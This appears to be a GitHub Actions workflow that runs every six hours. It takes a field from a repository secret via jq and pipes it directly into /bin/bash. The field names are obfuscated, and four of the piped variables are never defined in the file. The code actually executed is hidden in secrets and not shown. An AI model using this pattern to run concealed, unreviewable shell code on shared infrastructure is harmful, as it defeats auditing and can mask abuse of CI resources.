name: jixiaxingliang

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'

jobs:  # 8126
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixiaxingliang
        env:
          b7: ${{ secrets.b7 }}
        run: |
          echo $b7 | jq -r .a3 | /bin/bash
          echo $m16 | jq -r .cdmok23354 | /bin/bash
          echo $lv7203 | jq -r .iorkj532 | /bin/bash
          echo $i3111 | jq -r .x3 | /bin/bash
          echo $wcev3122 | jq -r .agm86337 | /bin/bash

